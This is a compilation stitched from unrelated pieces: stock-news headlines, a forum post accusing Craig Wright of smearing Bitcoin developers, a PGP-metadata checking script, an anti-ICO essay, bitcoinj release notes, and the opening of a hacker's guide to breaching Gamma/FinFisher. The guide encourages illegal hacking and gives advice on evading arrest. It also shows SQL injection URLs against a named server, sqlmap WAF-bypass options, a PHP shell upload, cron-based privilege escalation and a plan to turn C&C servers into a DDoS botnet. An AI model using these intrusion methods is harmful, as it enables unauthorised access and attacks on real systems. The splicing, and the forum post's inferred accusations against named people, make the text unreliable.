Overnight News Heading into Thursday August 27th 2020 (News Yet to be Traded 8:00 PM - 4:00 AM EST)
ADXN ($14.40) Addex and the SIB Swiss Institute of Bioinformatics Receive Innosuisse Grant to Repurpose Potent Dopamine Antagonist Using Computational Modelling
ALGT Allegiant Announces Seven New Routes With Fares As Low As $29* Each Way
TLSA ($3.97) Tiziana Life Sciences CEO Updates Shareholders on its Patent Portfolio, Clinical Pipeline, and Strategy in an Exclusive Interview
LBTYA Liberty Global Publishes Offer Prospectus for Sunrise Communications Group Tender Offer
NSP DEADLINE ALERT: Rigrodsky & Long, P.A. Reminds Shareholders Of Insperity Of Upcoming Deadline
CGG ($1.88) Adds Second Azimuth to Northern Viking Graben Multi-Client Survey
UAA ($9.88) Under Armour Sued By UCLA Over $280M Sponsorship Contract Breach
PHG Philips to expand its image-guided therapy devices portfolio through acquisition of Intact Vascular
CCC Clarivate Announces Appointment of Stefano Maestri as Chief Technology Officer
RDY Dr. Reddy's Laboratories announces the launch of Penicillamine Capsules USP, 250 mg in the U.S. Market
End of Day and After Hours News Heading into Thursday August 27th 2020 (News Traded 4:00 PM - 8:00 PM EST)
ABT ($103.19) Abbott's Fast, $5, 15-Minute, Easy-to-Use COVID-19 Antigen Test Receives FDA Emergency Use Authorization; Mobile App Displays Test Results to Help Our Return to Daily Life; Ramping Production to 50 Million Tests a Month
NSP DEADLINE ALERT: Rigrodsky & Long, P.A. Reminds Shareholders Of Insperity, Inc. Of Upcoming Deadline
CLVS ($4.96) FDA Approves FoundationOne® Liquid CDx to Serve as Rubraca® Companion Diagnostic to Identify Eligible Patients with BRCA1/2-Mutant, Metastatic Castration-Resistant Prostate Cancer
DSS ($6.27) Interview to Air on Bloomberg International on the RedChip Money Report
AMC ($5.60) AMC ready to open another 170 theaters for weekend
NTAP NetApp Stock Spikes After Earnings Crush Estimates
RIOT ($3.41) Riot buys more bitcoin miners, sees hashing capacity over 2 EH/s next year
FE FirstEnergy Utility Crews Mobilize to Assist Hurricane Laura Power Restoration Efforts in Texas
MESO Mesoblast Reports Substantial Operational Progress and Financial Results for the Year Ended June 30, 2020
GME GameStop Announces Second Quarter Fiscal 2020 Earnings Release Date
SPLK Splunk Slides as Revenues Miss Amid Business Model Shift
MSFT Microsoft Brings Back Halo Veteran to Get Delayed Game Back on Track
ET ($6.46) Army Corps seeks reversal of Dakota Access pipeline ruling
The blocksize debate, the personal attacks against reputable members of the community, and the Craig Wright revelations are all part of a well orchestrated campaign against Bitcoin. Proof inside?
Uber TL;DR: Craig Wright, anonymously via a report relating to the PGP key from December, attempted to smear and discredit members of the Bitcoin development community, accused Bitcoin Core of hijacking Bitcoin by imposing a blocksize limit, attacked small-block supporters, and heavily promoted big blocks. I hypothesize that the on-going blocksize campaign and Craig are highly connected. Scroll down for a non-Uber TL;DR, or just read the whole thing (yes, it's long :)).
First, some background. After the December leaks, a paper purporting to disprove Greg Maxwell's (nullc) allegations of backdating the PGP key was released by an unknown (at the time) author, titled "Appeal to authority: A failure of trust".
Abstract: In December 2015, a Motherboard article suggested that cryptographic keys ... were created using technology that was not available on the dates they were supposedly made ... in this paper we present evidence that disproves this claim ... In addition, a warning is rung regarding the onset of centralised authority in the control of bitcoin that has been achieved through Blocksize restrictions. These restrictions have led to centralisation of Bitcoin via the dogma of the core development team ...
As for the backdated keys revealed in the December outing, Mr Wright presents a report by First Response, a computer-forensics firm, which states that these keys could have been generated with an older version of the software in question.
While they do not explicitly state that this is the same paper linked above, what are the odds that two different papers were written to support Craig's claims? In all likelihood, Economist refers to the same "Appeal to authority: A failure of trust" paper, mentioning that it was written by a computer forensics firm named First Response. Now, to the interesting part. Within the paper (supposedly written by an independent third party firm), we have the following text:
Generally, an appeal to authority is fallacious when we cite those who have no special expertise. This is of greater concern when we have an individual believed or purporting to be an expert who abuses trust. Even experts have agendas and the only means to ensure that trust is valid is to hold those experts to a greater level of scrutiny.
That very same text (the bold portion) is also mentioned in that same Economist article, but this time attributed to Craig Wright himself:
In an article in the press kit accompanying the publication of his blog post, he takes aim at Gregory Maxwell, one of the leading bitcoin developers, who first claimed that the cryptographic keys in Mr Wright’s leaked documents were backdated. “Even experts have agendas,” he writes, “and the only means to ensure that trust is valid is to hold experts to a greater level of scrutiny.”
This could mean one of two things: either that Craig wrote that report (and presented it as if it was written by an independent third party forensics company), or that The Economist mis-attributed the text to Craig instead of to the First Response report. However, they already refer to this report earlier in the very same article (the second quote on this post) and attribute it to First Response. It is very unlikely that later in the same article they would mis-attribute this report to Craig. In addition, what does a forensics company have to do with Bitcoin politics? Why would they even mention that subject? And how would they even have the knowledge to do so?
My conclusion is: this report was written by none other than Craig Wright himself, who later used similar phrasing for self-attributed texts in his press kit. He then managed to get First Response to sign off on that report (or simply just lied about them being involved - would be interesting to try and check that).
Now, to the disturbing part. The author of this paper goes out of his way to attack and discredit Gregory Maxwell, over and over, throughout the entire article. He also repeatedly attacks the Bitcoin Core development community, the Bitcoin governance model, and those advocating for smaller blocks. I would say that 70%-80% of that paper is focused on politics, personal attacks against the Bitcoin technical community and heavy promotion for big blocks (later, in the Economist article, he's also advocating for 340GB blocks), in various phrasing that repeat over and over, with only 20%-30% of it actually being related to the technical questions surrounding the PGP key. Here are some selected quotes (there are many more!):
We may either conclude that Gregory Maxwell understood what he was asserting and has intentionally misled the community in stating that the PGP keys referenced had been backdated, or that a Bitcoin core developer did not understand the workings of PGP sufficiently.
In addition, a warning is rung regarding the onset of centralised authority in the control of bitcoin that has been achieved through Blocksize restrictions.
There is an inherent warning in the foregoing discussion with regard to the growing power of individuals who may not fully grasp the full potential of the Blockchain but who nevertheless have a disproportionate level of influence.
In limiting the size of the Block, the issue of control and the use of the protocol is centralised to a limited number of developers.
The bitcoin core protocol was never designed to be a single implementation maintain by a small cabal acting to restrain the heretics. In restricting the Blocksize, the end is the creation of a centralised management body.
Several core developers, including Gregory Maxwell have assumed a mantle of control. This is centralisation. It is not companies that we need to ensure do not violate our trust, but individuals.
Gregory Maxwell has been an avid supporter in limiting Blocksize. The arguments as to the technical validity of this change are political and act against the core principles of Bitcoin. The retention of limits on Block size consolidates power into the hands of a few individuals.
The position that has been assumed by those seeking centralisation of Bitcoin for many years is to create an artificial scarcity within Bitcoin associated with the limits on the Blocksize.
Those with power need to be held to a higher standard.
We can clearly assert that the evidence Maxwell has presented to justify his assertions to Motherboard that the PGP keys is false. His motives in this remain a mystery.
This report also uses the strawman logical fallacy, attributing Greg with claims that he never made while avoiding quoting his exact words (instead, opting to quote the press's paraphrase of Greg's words). While Greg said that the algorithms weren't in wide use at the alleged time of the key creation, they repeatedly mis-quote him as claiming that it was impossible to generate such a key at the time. Based on this strawman, they build mountains and hillsides, claiming that they can prove their claim in absolute logical terms ("This is a binary outcome and there cannot be any other result. Either creating the keys was possible, or the evidence reported by Motherboard was unfounded").
That was what Greg actually wrote:
Incidentally; there is now more evidence that it's faked. The PGP key being used was clearly backdated: its metadata contains cipher-suites which were not widely used until later software.
This is what the report claims:
In the logical analysis of evidence, we cannot have contradictions. Where such a contradiction exists, we need to check our premises. In this process that we are exploring together, either we can recreate a similar key along the lines of the one Maxwell has stated could not have existed (WAS NEVER SAID! N.I.) and must have been backdated, or we cannot. If we can create a key using the GnuPG software from 2007 and add the attributes of the disputed keys to a newly created key pair, then Maxwell is wrong. If we cannot complete this process, then he was correct and the keys could have been backdated. This is a binary outcome and there cannot be any other result. Either creating the keys was possible, or the evidence reported by Motherboard was unfounded.
We see here the default hash list of “2.8.3” as Maxwell asserts is the only available choice. (WAS NEVER SAID! N.I.)
The importance of this statement is that Maxwell has firmly asserted that the algorithms, “8,2,9,10,11” have only been added from a later period in 2009 ... We have engaged in this exercise in order to demonstrate that the former statement made by Maxwell is incorrect.
This exercise proves that those algorithms that had been stated to not exist at the time within GnuPG 1.4.7 had indeed been implemented. Maxwell’s assertion is false.
That report is, of course, total and utter nonsense. The algorithms did exist in PGP (no one claimed otherwise), but there was no ciphersuite that combined them together. It was indeed possible to manually select that ciphersuite, the command to do so would look like that:
There's no way that anyone would choose these exact algorithms under the exact same order before it was added as the default to PGP. It's important to note that the ciphersuite was chosen by the open source community after much discussions and knowledge acquired over time regarding the algorithms, which showed this combination to be the most secure. Foreseeing that this suite is going to be the state of the art, a few years before the PGP community figured it out, is extremely unlikely.
TL;DR
After Greg exposed Craig's bluff regarding the PGP key from December, Craig writes a report that allegedly proves his key wasn't backdated. It is published on late December '15 - Early January '16 (anyone has an exact date?).
That entire article is based on a strawman, and doesn't really prove anything. It shows that it could be technically possible to create such a key at the alleged time, but completely disregards the fact that the likelihood of that happening is practically zero.
He released this report anonymously, not attributing it to anyone.
He uses this opportunity to discredit Greg, repeatedly attacking his personal integrity and technical competence. He also attacks Bitcoin Core with claims of a hostile takeover by a "small cabal" that wants to control Bitcoin by restricting the blocksize. He smears the "small blocks camp", while heavily advocating for larger blocks. He does that using personal attacks and severe words pointed at highly respected members of the community. About 70%-80% of the report isn't related to the PGP key at all, but rather to politics and attacks.
In his press kit for the revelation, he attaches this report, this time attributed to a forensics company called First Response. In addition to the report, he attaches more attacks against Greg, which he does attribute to himself. The phrasing of his self-attributed attacks strikes an extraordinary resemblance to the attacks in the report.
Having read this report, I now believe that what we're seeing is another stage of a well orchestrated attack on Bitcoin, whose goal is to discredit reputable members of the Bitcoin community, create factions within the community and to sow distrust among community members. This attack hasn't started now. The opening shot was the block size campaign, which was designed to spread toxicity and dissent, promote personal attacks against thought leaders and technical experts, and split the community into two opposing camps. The goal is to disassemble the human and social fabric of Bitcoin, to subvert our trust in the cypher-punk "leaders" of the bitcoin space and to create chaos and confusion, in order to prepare the ground for the second stage - a hostile takeover of the Bitcoin protocol development via a person claiming to be Satoshi Nakamoto, which will support this new development team and lead people after him.
I don't usually tend to be overly conspirative, but this report is highly disturbing. It has the very clear agenda of attacking Bitcoin Core and the consensus mechanism, while heavily promoting big blocks. We have appealing evidence that it was written by Craig, which also continues his attack as part of his press release. All of that leads me to believe that the blocksize campaign, the non-stop attacks against the Bitcoin development community and thought leaders, and the Craig revelation as "being Satoshi" are all tightly connected as part of an orchestrated attack. And all of that follows repeating evidence of ongoing sock-puppets and rating manipulation within our online communities, Sybil attacks on the P2P network to create a false image of Classic support, and DDoS attacks (interesting to note that voting manipulation was put into use with greater vigor during the Craig revelations, according to theymos - "there's substantial vote manipulation in /Bitcoin right now"). I truly believe that this is the real thing.
We're witnessing an orchestrated full-scale attack on Bitcoin, by a well-organized entity with significant financial means. Buckle up!
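The forensic check behind the backdating argument above, as an added example that is not part of the original post or of any tool it mentions: it parses the hashed subpackets of an OpenPGP self-signature (RFC 4880 layout) and flags a key whose claimed creation time predates the point at which its hash preference list became a default. The two preference lists are the ones quoted on this page; the cutoff date, the 2008 timestamp and the sample byte strings are constructed assumptions.

```python
import struct
from datetime import datetime, timezone

# RFC 4880 section 5.2.3.1 subpacket types used by this check.
CREATION_TIME, PREF_HASH = 2, 21
HASH_NAMES = {1: "MD5", 2: "SHA1", 3: "RIPEMD160",
              8: "SHA256", 9: "SHA384", 10: "SHA512", 11: "SHA224"}

# Hash preference lists as quoted on this page from the report.
LATER_DEFAULT_HASH = (8, 2, 9, 10, 11)
OLDER_DEFAULT_HASH = (2, 8, 3)
# Assumption: the page only says "a later period in 2009"; supply your own date.
ASSUMED_DEFAULT_CHANGE = datetime(2009, 1, 1, tzinfo=timezone.utc)


def parse_subpackets(area: bytes) -> dict:
    """Split a hashed-subpacket area into {subpacket type: body bytes}."""
    found, i = {}, 0
    while i < len(area):
        first = area[i]
        if first < 192:                       # one-octet length
            length, i = first, i + 1
        elif first < 255:                     # two-octet length
            if i + 2 > len(area):
                raise ValueError("truncated subpacket length")
            length, i = ((first - 192) << 8) + area[i + 1] + 192, i + 2
        else:                                 # 0xFF marker + four-octet length
            if i + 5 > len(area):
                raise ValueError("truncated subpacket length")
            length, i = struct.unpack(">I", area[i + 1:i + 5])[0], i + 5
        # The length counts the type octet, so it can never be zero.
        if length < 1 or i + length > len(area):
            raise ValueError("truncated subpacket body")
        found[area[i] & 0x7F] = area[i + 1:i + length]  # drop the critical bit
        i += length
    return found


def assess(area: bytes, default_change: datetime = ASSUMED_DEFAULT_CHANGE) -> dict:
    """Compare the self-asserted creation time with the preference list."""
    sp = parse_subpackets(area)
    raw_time = sp.get(CREATION_TIME, b"")
    if len(raw_time) != 4:
        raise ValueError("no 4-octet creation time subpacket")
    created = datetime.fromtimestamp(struct.unpack(">I", raw_time)[0],
                                     tz=timezone.utc)
    prefs = tuple(sp.get(PREF_HASH, b""))
    matches_later = prefs == LATER_DEFAULT_HASH
    return {
        "claimed_created": created,
        "hash_prefs": [HASH_NAMES.get(h, f"unknown({h})") for h in prefs],
        "matches_later_default": matches_later,
        # The timestamp is whatever the creator's clock said; the preference
        # list reflects the software (or a manual choice) that wrote the key.
        "suspicious": created < default_change and matches_later,
    }


def build_area(created: datetime, hash_prefs: tuple) -> bytes:
    """Constructed input: a creation-time and a hash-preference subpacket."""
    def sub(sp_type: int, body: bytes) -> bytes:
        return bytes([len(body) + 1, sp_type]) + body   # short bodies only
    return (sub(CREATION_TIME, struct.pack(">I", int(created.timestamp())))
            + sub(PREF_HASH, bytes(hash_prefs)))


CLAIMED_2008 = datetime(2008, 10, 30, tzinfo=timezone.utc)   # constructed date
SUSPECT = build_area(CLAIMED_2008, LATER_DEFAULT_HASH)
CONTROL = build_area(CLAIMED_2008, OLDER_DEFAULT_HASH)

if __name__ == "__main__":
    for name, area in (("suspect", SUSPECT), ("control", CONTROL)):
        result = assess(area)
        print(name, result["claimed_created"].date(),
              result["hash_prefs"], "suspicious:", result["suspicious"])
```

A hit is an indicator rather than proof, since, as the post notes, the same preference list could have been selected by hand.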
There is a big cognitive dissonance within the crypto community. The dream of decentralization and censorship resistance is dominated by big centralized exchanges, centralized empires like Binance and Coinbase. Speculation still drives the market and fuels the continued growth of centralized exchanges. One of the leading factors fueling the revenue stream of exchanges is new coins, namely ICOs and in future STOs. ICOs became nothing more than a way of Flipping Tokens. Most ICOs used and continue to use Proof of Greater Fool to push forward their blockchain. People invest in something that they know is probably worthless and extremely overpriced, hoping that they can sell that worthless overpriced digital token to a "Greater Fool". In the end, all ICO investors are fools because even if Fool #1 manages to Flip the token at 3x the price he bought it at, he is still the fool compared to the ICO that now holds millions collected by all the #1 fools.
Essentially ICOs that list on exchanges right away that have nothing to offer and no product are basically Ponzi schemes, with the ICO team at the top, ICO Buyers in the second layer and people on the exchange at the bottom of the pyramid. The IEO (Initial Exchange Offering) is a natural evolution of this Ponzi scheme: now ICOs and exchanges work together to pump up the price, being able to freely manipulate the price of the token and print free money. As Cryptocurrencies are a totally unregulated market they are pretty much free to do whatever they want. Cryptocurrency exchanges basically became empires fueled by greed, trading fees, listing fees, and so much more. These empires have no interest in changing the system, similar to how banks do not want to give away power. It is expected of anyone in power to be very corrupt in a totally uncontrolled market.
BUIDL VS Initial Exchange Offerings
In 2019, for the first time in 3 years, projects that focused on tech, product, and business development came out of the darkness. Most people pretended to work to look good to raise money; however, some actually worked to solve problems. 2019 was also the year that we started to see Initial Exchange Offerings: ICOs conducted on exchanges rather than publicly. The original purpose of ICOs was to take the monopoly on fundraising away from stock exchanges and brokerage firms. An IEO is well explained in that scene of Wolf of Wall Street, when they opened an IPO for Steve Madden shoes. Remember when a centralized entity is responsible for issuing a new stock? It probably has a vast interest in pumping that price, but is it legal in the traditional financial space?
ICOs that are actually working hard to build their product also understand that in order for their projects to become successful they need to become decentralized. They need to get their tokens in as many hands as possible. Of course, the person that is attached to that hand should also bring value to the project. The best example of the power of useful decentralization is Bitcoin. Bitcoin has pretty old tech, had a few bugs in its source code, and is super slow, yet it has by far the best community and strongest social consensus. Hashrate doesn't mean much; after all, Bitcoin Cash had a bigger hash rate for a brief while, but it was the social consensus of the mining community that decided not to implement the new changes introduced by Roger and Bitmain. Now BCH is less than 96% of the market Cap it used to be.
The value of cryptocurrencies is defined by nothing more than censorship resistance, game theory, and token holders. In the long term, these three factors will be decisive in determining which coin will have the biggest market cap. Bitcoin has by far the most censorship resistance, probably one of the best game theories and by far the best community.
The value of a coin is pretty much all about: how hard it is to change the information saved on the block * (sum of all useful skills and influence amongst all token holders) that can be leveraged by game theory within the ecosystem.
Best case vs Worst Case outcome for an ICO
An ICO that is used for its actual purpose and not as a vehicle to facilitate scamming, can be seen as the big bang of any new blockchain ecosystem. Successful ICOs understand that they need to act like economies, not companies. Usually, economies filled with smart people that can utilize their skills to push their ecosystem that is also run by the good government (good game theory) do very well, compared to economies that have a very small set of inhabitants that can bring economic value for influence and skill sets. The optimal scenario for an ICO would be if the tokens were magically distributed among the best developers, business integrators, influencers, politicians and basically anybody that would be willing and capable of bringing value to the new blockchain ecosystem. Bitcoin’s mechanism to achieve this magical community was via mining and its 4-year reward halving cycle. It takes a great deal of passion and technical skills to start mining. Also, the low token price during the first few years motivated the best developers, who are also deeply interested in the technology, to jump onboard and help on its development efforts. This also allowed them to acquire a lot of tokens in the process. The 4 year Bitcoin Pump and Dumps enable very smart individuals to join the bitcoin ecosystem every 4 years and accumulate at low prices. Regulators love crypto once they’ve also bought a bag. Therefore the best outcome is the magical distribution of tokens to all the best developers, business integrators, influencers, politicians and basically anybody that would be willing and able to help that new blockchain ecosystem. The worst case would be an ICO whose tokens holders are mostly speculators, also known as an initial Exchange offering.
Mike Hearn posted this on the Bitcoin Developer Mailing List:
I'm pleased to announce the release of bitcoinj 0.11, a library for writing Bitcoin applications that run on the JVM. BitcoinJ is widely used across the Bitcoin community; some users include Bitcoin Wallet for Android, MultiBit, Hive, blockchain.info, the biteasy.com block explorer (written in Lisp!), Circle, Neo/Bee (Cypriot payment network), bitpos.me, Bitcoin Touch, BlueMatt's relay network and DNS crawler, academic advanced contracts research and more. The release-0.11 git tag is signed by Andreas Schildbach's GPG key. The commit hash is 410d4547a7dd. This paragraph is signed by the same Bitcoin key as with previous releases (check their release announcements to establish continuity). Additionally, this email is signed using DKIM and for the first time, a key that was ID verified by the Swiss government. Key: 16vSNFP5Acsa6RBbjEA7QYCCRDRGXRFH4m Signature for last paragraph: H3DvWBqFHPxKW/cdYUdZ6OHjbq6ZtC5PHK4ebpeiE+FqTHyRLJ58BItbC0R2vo77h+DthpQigdEZ0V8ivSM7VIg=
Thanks to Mike Belshe, the wallet can now send to P2SH addresses.
Thanks to Matt Corallo, the network layer was rewritten from scratch. It no longer depends on Netty, and it now supports both blocking and non-blocking sockets. In practice that means Java's built in support for transparent SSL and SOCKS becomes available again, which in turn means connecting via Tor is now possible. The new framework is lightweight, easy to understand and has been running a DNS seed crawler for some months now.
Thanks to Kevin Greene, we've added some support for the BIP70 payment protocol. Wallet authors can now consume payment requests, check their signatures and submit payments with the new easy to use PaymentSession class. The wallet-tool command line UI has support and an article explains how to use it.
Thanks to Miron Cuperman, the wallet can now watch arbitrary addresses and scripts. The wallet could previously watch an address as long as the public key was known. Now it's possible to watch for addresses even when the public key is not known.
Also thanks to Miron, Bloom filtering was also improved. The system now tracks false positive rates and cleans the filter when FP rates get too high. Unfortunately, some privacy bugs in Bloom filtering remain, which could (amongst other things) allow a malicious remote peer to test whether you own a particular key.
Thanks to Alex Taylor (bitpos.me), a new PostgreSQL based pruning block store was added. This block store is fast, and indexes the UTXO set, allowing for fast lookup of the balance of any given address.
A Java 8 based wallet template app is now included. The template is designed for people writing contract based applications. It provides a simple app that can be copy/pasted, which connects to the P2P network, manages a wallet, and provides a GUI that shows progress, balance, address+qrcode for receiving money and has a button that is used to empty the wallet out. It's designed to have an attractive and modern look, with tasteful animations and artwork.
Micropayment channels got many big improvements to the API and implementation. The release in 0.10 can be seen as a beta, in this release the micropayments code has been taken for a test drive for a couple of real apps and many rough edges polished as a result.
The default USER_THREAD executor can now be replaced, allowing a 1-line switch of all callbacks onto a thread of your choice instead of needing to override each callback, each time. This should simplify and clean up the GUI code of wallet apps significantly.
The WalletTool command line app has a more convenient user interface now.
A new DNS seed has been added. The seed is run by Christian Decker, from ETH Zurich.
bitcoinj 0.11 will shortly be available via Maven Central. Please use the dependency verifier plugin and/or check the PGP signatures on the uploads, if you use this!
We finished adding nullity annotations to the API. You should now be able to assume that any method not annotated with @Nullable won't ever return null values.
The WalletAppKit got a bunch of new features and convenience APIs.
The wallet will now create inputs with dummy signatures if the private key for an output is missing, rather than throwing an exception. You can then edit the input later to substitute in a real signature. This is useful when the signing is being done elsewhere, outside of the library.
In full verification mode, execution of scripts (i.e. checking signatures) can now be switched off. This is useful if you trust the source of the chain and just want to calculate the UTXO set.
The wallet risk analysis code is now pluggable, better documented and checks for finality in a more sensible way.
Various memory usage and flow control optimisations were made to allow much larger wallets to sync on Android.
The transaction broadcast algorithm was changed to be more robust.
Double spend handling in the wallet was improved.
Generated signatures now use canonical S values. This will aid a future hard-forking rule change which bans malleable signatures.
Some fixes were made to enable usage with the Orchid Tor library. Further support for Tor is planned for future releases.
Notable bug fixes
Some hard-forking full verification bugs were fixed.
Thanks to Miron, PeerGroup now performs exponential backoff for peer connections, for instance if we cannot connect to them or if they disconnect us. This resolves an annoying bug in which if the library was configured with a single peer that was down, it would spin in a tight loop consuming battery.
Some functionality of the Wallet class was moved into separate classes under the wallet package.
The micropayments API and protocol changed. New clients/servers are not compatible with apps running against previous releases.
The Wallet sendCoins/completeTx methods no longer return booleans or null to indicate failure, they now throw InsufficientMoneyException or a subclass if the transaction cannot be completed. The exception object typically contains information on how much money is missing.
Some mis-named methods in the HD key derivation API were renamed.
The WalletEventListener interface has an extra method for watching scripts now.
Peer discovery classes moved under the net.discovery package
Any APIs that relied on Netty are now different.
An article on the networking API
Info on testing your apps, and how to use regtest mode to make a private Bitcoin network that allows you to mine blocks instantly.
A reference table showing which APIs implement which Bitcoin Improvement Proposals (BIPs).
--1-- Introduction
I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request.
-- 2 -- Staying Safe
This is illegal, so you'll need to take some basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target.
-- 3 -- Mapping out the target
Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com
...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it.
-- 4 -- Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.com/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserver/.svn/, webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy.
6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them.
For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tamper/modsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in!
-- 5 -- (fail at) Escalating
< got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network.
-- 6 -- Pivoting
The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware.
-- 7 -- Have Fun
Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make do with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2!
-- 8 -- Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are:
